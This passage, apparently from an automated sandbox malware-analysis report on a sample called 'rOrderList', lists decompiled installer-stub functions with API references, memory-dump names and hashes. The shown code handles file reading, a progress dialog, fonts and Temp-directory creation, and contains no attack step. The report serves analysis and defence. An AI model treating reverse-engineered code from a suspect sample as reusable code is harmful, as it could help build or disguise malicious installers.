                                                                                      								goto L37;
                                                                                      								L26:
                                                                                      								__eax =  *(__ebp - 8);
                                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                      						}
                                                                                      						goto L34;
                                                                                      					}
                                                                                      				}
                                                                                      				L37:
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x004026e4
                                                                                      0x004026e6
                                                                                      0x004026e9
                                                                                      0x004026eb
                                                                                      0x004026ee
                                                                                      0x004026f3
                                                                                      0x004026f7
                                                                                      0x004026fa
                                                                                      0x004026fd
                                                                                      0x00402bc2
                                                                                      0x00402bc5
                                                                                      0x00402703
                                                                                      0x00402703
                                                                                      0x0040270a
                                                                                      0x0040270c
                                                                                      0x0040270c
                                                                                      0x00402712
                                                                                      0x00402876
                                                                                      0x00402876
                                                                                      0x00402879
                                                                                      0x0040287e
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00000000
                                                                                      0x00402718
                                                                                      0x00402719
                                                                                      0x00402724
                                                                                      0x00402727
                                                                                      0x00402733
                                                                                      0x00402737
                                                                                      0x004027cf
                                                                                      0x004027e7
                                                                                      0x004027f7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040273d
                                                                                      0x0040273d
                                                                                      0x00402740
                                                                                      0x00402741
                                                                                      0x00402744
                                                                                      0x00402749
                                                                                      0x00402750
                                                                                      0x00402758
                                                                                      0x00000000
                                                                                      0x0040275e
                                                                                      0x0040275e
                                                                                      0x00402763
                                                                                      0x00000000
                                                                                      0x00402769
                                                                                      0x00402769
                                                                                      0x00402771
                                                                                      0x00402774
                                                                                      0x00402777
                                                                                      0x00402832
                                                                                      0x00402839
                                                                                      0x0040277d
                                                                                      0x00402783
                                                                                      0x0040278f
                                                                                      0x004027f9
                                                                                      0x004027f9
                                                                                      0x00402791
                                                                                      0x00402791
                                                                                      0x00402794
                                                                                      0x00402796
                                                                                      0x00402796
                                                                                      0x00402796
                                                                                      0x00402799
                                                                                      0x0040279e
                                                                                      0x004027a1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004027a3
                                                                                      0x004027a6
                                                                                      0x004027b4
                                                                                      0x004027ba
                                                                                      0x004027c8
                                                                                      0x00000000
                                                                                      0x004027ca
                                                                                      0x00000000
                                                                                      0x004027ca
                                                                                      0x00000000
                                                                                      0x004027c8
                                                                                      0x00402796
                                                                                      0x004027fc
                                                                                      0x004027ff
                                                                                      0x00000000
                                                                                      0x00402801
                                                                                      0x00402806
                                                                                      0x00402847
                                                                                      0x00402869
                                                                                      0x00402870
                                                                                      0x00402855
                                                                                      0x00402855
                                                                                      0x00402858
                                                                                      0x0040285b
                                                                                      0x0040285e
                                                                                      0x0040285e
                                                                                      0x00000000
                                                                                      0x0040280f
                                                                                      0x0040280f
                                                                                      0x00402812
                                                                                      0x00402815
                                                                                      0x0040281b
                                                                                      0x0040281f
                                                                                      0x00402822
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402822
                                                                                      0x00402806
                                                                                      0x004027ff
                                                                                      0x00402777
                                                                                      0x00402763
                                                                                      0x00402758
                                                                                      0x00000000
                                                                                      0x00402824
                                                                                      0x00402824
                                                                                      0x00402827
                                                                                      0x00402830
                                                                                      0x00000000
                                                                                      0x00402727
                                                                                      0x00402712
                                                                                      0x00402bcb
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                        • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                                                                      • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
                                                                                      • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                                                                      • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402FC6(intOrPtr _a4) {
                                                                                      				short _v132;
                                                                                      				long _t6;
                                                                                      				struct HWND__* _t7;
                                                                                      				struct HWND__* _t15;
                                                                                      
                                                                                      				if(_a4 != 0) {
                                                                                      					_t15 =  *0x420efc; // 0x0
                                                                                      					if(_t15 != 0) {
                                                                                      						_t15 = DestroyWindow(_t15);
                                                                                      					}
                                                                                      					 *0x420efc = 0;
                                                                                      					return _t15;
                                                                                      				}
                                                                                      				__eflags =  *0x420efc; // 0x0
                                                                                      				if(__eflags != 0) {
                                                                                      					return E0040696D(0);
                                                                                      				}
                                                                                      				_t6 = GetTickCount();
                                                                                      				__eflags = _t6 -  *0x42a270;
                                                                                      				if(_t6 >  *0x42a270) {
                                                                                      					__eflags =  *0x42a268;
                                                                                      					if( *0x42a268 == 0) {
                                                                                      						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F2B, 0);
                                                                                      						 *0x420efc = _t7;
                                                                                      						return ShowWindow(_t7, 5);
                                                                                      					}
                                                                                      					__eflags =  *0x42a334 & 0x00000001;
                                                                                      					if(( *0x42a334 & 0x00000001) != 0) {
                                                                                      						wsprintfW( &_v132, L"... %d%%", E00402FAA());
                                                                                      						return E004055A4(0,  &_v132);
                                                                                      					}
                                                                                      				}
                                                                                      				return _t6;
                                                                                      			}







                                                                                      0x00402fd5
                                                                                      0x00402fd7
                                                                                      0x00402fde
                                                                                      0x00402fe1
                                                                                      0x00402fe1
                                                                                      0x00402fe7
                                                                                      0x00000000
                                                                                      0x00402fe7
                                                                                      0x00402fef
                                                                                      0x00402ff5
                                                                                      0x00000000
                                                                                      0x00402ff8
                                                                                      0x00402fff
                                                                                      0x00403005
                                                                                      0x0040300b
                                                                                      0x0040300d
                                                                                      0x00403013
                                                                                      0x00403051
                                                                                      0x0040305a
                                                                                      0x00000000
                                                                                      0x0040305f
                                                                                      0x00403015
                                                                                      0x0040301c
                                                                                      0x0040302d
                                                                                      0x00000000
                                                                                      0x0040303b
                                                                                      0x0040301c
                                                                                      0x00403067

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
                                                                                      • GetTickCount.KERNEL32 ref: 00402FFF
                                                                                      • wsprintfW.USER32 ref: 0040302D
                                                                                        • Part of subcall function 004055A4: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                                                        • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                                                        • Part of subcall function 004055A4: lstrcatW.KERNEL32(Completed,00403040), ref: 004055FF
                                                                                        • Part of subcall function 004055A4: SetWindowTextW.USER32(Completed,Completed), ref: 00405611
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                                                                                        • Part of subcall function 00402FAA: MulDiv.KERNEL32(00000000,00000064,0000058E), ref: 00402FBF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 722711167-2449383134
                                                                                      • Opcode ID: ca49b03332079f9d63e61ee0f640dca30561273b5aba0e10e1ae32c3f60c6d11
                                                                                      • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                                                                                      • Opcode Fuzzy Hash: ca49b03332079f9d63e61ee0f640dca30561273b5aba0e10e1ae32c3f60c6d11
                                                                                      • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404E4D(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				long _v8;
                                                                                      				signed char _v12;
                                                                                      				unsigned int _v16;
                                                                                      				void* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				long _v56;
                                                                                      				void* _v60;
                                                                                      				long _t15;
                                                                                      				unsigned int _t19;
                                                                                      				signed int _t25;
                                                                                      				struct HWND__* _t28;
                                                                                      
                                                                                      				_t28 = _a4;
                                                                                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                      				if(_a8 == 0) {
                                                                                      					L4:
                                                                                      					_v56 = _t15;
                                                                                      					_v60 = 4;
                                                                                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                      					return _v24;
                                                                                      				}
                                                                                      				_t19 = GetMessagePos();
                                                                                      				_v16 = _t19 >> 0x10;
                                                                                      				_v20 = _t19;
                                                                                      				ScreenToClient(_t28,  &_v20);
                                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                                      					_t15 = _v8;
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return _t25 | 0xffffffff;
                                                                                      			}














                                                                                      0x00404e5b
                                                                                      0x00404e68
                                                                                      0x00404e6e
                                                                                      0x00404eac
                                                                                      0x00404eac
                                                                                      0x00404ebb
                                                                                      0x00404ec2
                                                                                      0x00000000
                                                                                      0x00404ec4
                                                                                      0x00404e70
                                                                                      0x00404e7f
                                                                                      0x00404e87
                                                                                      0x00404e8a
                                                                                      0x00404e9c
                                                                                      0x00404ea2
                                                                                      0x00404ea9
                                                                                      0x00000000
                                                                                      0x00404ea9
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                                                                                      • GetMessagePos.USER32 ref: 00404E70
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404E8A
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 73%
                                                                                      			E00401E4E(intOrPtr __edx) {
                                                                                      				void* __edi;
                                                                                      				int _t9;
                                                                                      				signed char _t15;
                                                                                      				struct HFONT__* _t18;
                                                                                      				intOrPtr _t30;
                                                                                      				void* _t31;
                                                                                      				struct HDC__* _t33;
                                                                                      				void* _t35;
                                                                                      
                                                                                      				_t30 = __edx;
                                                                                      				_t33 = GetDC( *(_t35 - 8));
                                                                                      				_t9 = E00402D1C(2);
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                      				ReleaseDC( *(_t35 - 8), _t33);
                                                                                      				 *0x40ce08 = E00402D1C(3);
                                                                                      				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                      				 *0x40ce0f = 1;
                                                                                      				 *0x40ce0c = _t15 & 0x00000001;
                                                                                      				 *0x40ce0d = _t15 & 0x00000002;
                                                                                      				 *0x40ce0e = _t15 & 0x00000004;
                                                                                      				E00406579(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                      				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                                      				_push(_t18);
                                                                                      				_push(_t31);
                                                                                      				E00406483();
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x00401e4e
                                                                                      0x00401e59
                                                                                      0x00401e5b
                                                                                      0x00401e68
                                                                                      0x00401e7f
                                                                                      0x00401e84
                                                                                      0x00401e91
                                                                                      0x00401e96
                                                                                      0x00401e9a
                                                                                      0x00401ea5
                                                                                      0x00401eac
                                                                                      0x00401ebe
                                                                                      0x00401ec4
                                                                                      0x00401ec9
                                                                                      0x00401ed3
                                                                                      0x00402630
                                                                                      0x0040156d
                                                                                      0x00402b08
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: Calibri
                                                                                      • API String ID: 3808545654-1409258342
                                                                                      • Opcode ID: 6d6c62c04bab17be7bca7ce64f8e3236457cc26e69c7d95cef44091556f8642c
                                                                                      • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
                                                                                      • Opcode Fuzzy Hash: 6d6c62c04bab17be7bca7ce64f8e3236457cc26e69c7d95cef44091556f8642c
                                                                                      • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405A73(WCHAR* _a4) {
                                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                                      				long _t23;
                                                                                      
                                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                      				_v36.Owner = 0x4083f8;
                                                                                      				_v36.Group = 0x4083f8;
                                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                                      				_v36.Revision = 1;
                                                                                      				_v36.Control = 4;
                                                                                      				_v36.Dacl = 0x4083e8;
                                                                                      				_v16.nLength = 0xc;
                                                                                      				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                                                                                      					L1:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t23 = GetLastError();
                                                                                      				if(_t23 == 0xb7) {
                                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return _t23;
                                                                                      			}






                                                                                      0x00405a7e
                                                                                      0x00405a82
                                                                                      0x00405a85
                                                                                      0x00405a8b
                                                                                      0x00405a8f
                                                                                      0x00405a93
                                                                                      0x00405a9b
                                                                                      0x00405aa2
                                                                                      0x00405aa8
                                                                                      0x00405aaf
                                                                                      0x00405abe
                                                                                      0x00405ac0
                                                                                      0x00000000
                                                                                      0x00405ac0
                                                                                      0x00405aca
                                                                                      0x00405ad1
                                                                                      0x00405ae7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405ae9
                                                                                      0x00405aed

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                                                                      • GetLastError.KERNEL32 ref: 00405ACA
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                                                                                      • GetLastError.KERNEL32 ref: 00405AE9
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                                                                                      • C:\Users\user\Desktop, xrefs: 00405A73
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                      • API String ID: 3449924974-26219170
                                                                                      • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                      • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                                                                                      • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                      • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				short _v132;
                                                                                      				void* _t11;
                                                                                      				WCHAR* _t19;
                                                                                      
                                                                                      				if(_a8 == 0x110) {
                                                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                                                      					_a8 = 0x113;
                                                                                      				}
                                                                                      				if(_a8 == 0x113) {
                                                                                      					_t11 = E00402FAA();
                                                                                      					_t19 = L"unpacking data: %d%%";
                                                                                      					if( *0x42a274 == 0) {
                                                                                      						_t19 = L"verifying installer: %d%%";
                                                                                      					}
                                                                                      					wsprintfW( &_v132, _t19, _t11);
                                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}






                                                                                      0x00402f3b
                                                                                      0x00402f49
                                                                                      0x00402f4f
                                                                                      0x00402f4f
                                                                                      0x00402f5d
                                                                                      0x00402f5f
                                                                                      0x00402f6b
                                                                                      0x00402f70
                                                                                      0x00402f72
                                                                                      0x00402f72
                                                                                      0x00402f7d
                                                                                      0x00402f8d
                                                                                      0x00402f9f
                                                                                      0x00402f9f
                                                                                      0x00402fa7

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                      • wsprintfW.USER32 ref: 00402F7D
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402F8D
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1158693248
